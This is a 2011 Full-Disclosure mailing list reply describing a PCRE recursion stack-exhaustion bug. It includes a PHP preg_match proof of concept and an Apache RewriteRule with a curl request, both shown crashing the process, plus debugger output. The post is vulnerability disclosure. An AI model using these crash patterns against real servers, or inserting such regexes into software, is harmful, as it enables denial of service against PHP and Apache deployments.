[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] New Opera 11.51 PoC Denial of Service (pigtail23)

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: Re: [Full-disclosure] New Opera 11.51 PoC Denial of Service (pigtail23)
From: Maksymilian Arciemowicz <cxib@xxxxxxxxxxxxxxxxxx>
Date: Sun, 23 Oct 2011 02:02:40 +0200

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

stack exhaustion. it's seems to recursion problem for basic regular
expression. the same or similar problem exists in PCRE 8.12, allowing to
crash multiple applications

cx@cx64:/www$ cat crash0.php
<?php
preg_match("/((.*)((!?.*)+)\\w+)/iU",str_repeat(" ",4096),$exxx);
?>
cx@cx64:/www$ php crash0.php
Segmentation fault

or some times ago for apache,

127# cat .htaccess
RewriteEngine On
RewriteBase   /rcrash
RewriteRule gun((.*){2000,}(\s*){2000,}.*) /ygy
127# curl http://127.0.0.1/rcrash/gun
curl: (52) Empty reply from server

[Mon Jul 11 02:40:39 2011] [notice] child pid 1343 exit signal Illegal
instruction (4)

Program received signal SIGSEGV, Segmentation fault.
0x08097a9b in match (eptr=0xbb777b07 "", ecode=0xbb76ab6f "*\bB",
    offset_top=8, md=0xbfbfe284, ims=0, eptrb=0xbfa02014, flags=2)
    at pcre.c:7997
7997        c = *ecode++ - OP_TYPESTAR;

that is the same problem.

- --
Best Regards
pub   4096R/D6E5B530 2010-09-19
uid                  Maksymilian Arciemowicz (cx) <max@xxxxxxxx>
sub   4096R/58BA663C 2010-09-19
-----BEGIN PGP SIGNATURE-----

iQIcBAEBAgAGBQJOo1mUAAoJEIO8+dzW5bUwMBwP/3M0LD5DaXzuwvT3jhmuxi+m
aQ8/66efeFAYqcm8XFTx4xcinA6thDvxV05VHUN1TwJbBUY/m0IatD5WdD3gCY2/
R61fg3zmYZoKg5+aeSCJT3VSJbhQbA8pcQoDQp8BI+AdLv9D1hGu6n8qMC9xF6Lx
4ef/sqTZfsGZObKU1ualRvKa5MWT9N78r8ufDDwxEnDnk6IigrKnnRfsnQsZbboW
i1hGwyJhDNI0s9HJzyT2t0sru3aGdSXXVoKlSkmtfVbhvpmT8gyIWr3xNJZQWXRP
odGNXPJ4/+yKXZh5jjNZ4tFqc4ARkkpG5WxqoLOwVYucTQgcJeh61gt42cMnAnFM
NNKYjhFS1IKiuW8UXWPDB6hoVySBsOArhZK7d6P/h3PsMNGVm1lixfQMX5e1JNQb
5KUu704p1ONDyzC5JWqfdGYwXE3K10sDZJ6K7n0vgEtmfGVX3WKjIybnAlnZ5CT/
7MCo4xGKB7vuMUeZaBInKvLwr/a1LZK1MFMPcu+ypNBLJI6FWG98OsNttpRz2jRz
O0dq0BNAGZR8zTYnd6JD7zTKpk9IIHoQLJjDjTDsxZrOFnLrF6FTqCwUSuTo9ldi
r+T3GU0+dtBTUG34mBPxWSYlGUag6xjLlyOZDpSniSSwj8brsCKuXlOf67Hh2VHW
MfKU/5PxCy6TYZjdAROB
=L6P1
-----END PGP SIGNATURE-----

Attachment: 0xD6E5B530.asc
Description: application/pgp-keys

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] jara 1.6 sql injection vulnerability
Next by Date: [Full-disclosure] [ GLSA 201110-20 ] Clam AntiVirus: Multiple vulnerabilities
Previous by thread: [Full-disclosure] jara 1.6 sql injection vulnerability
Next by thread: [Full-disclosure] [ GLSA 201110-20 ] Clam AntiVirus: Multiple vulnerabilities
Index(es):
- Date
- Thread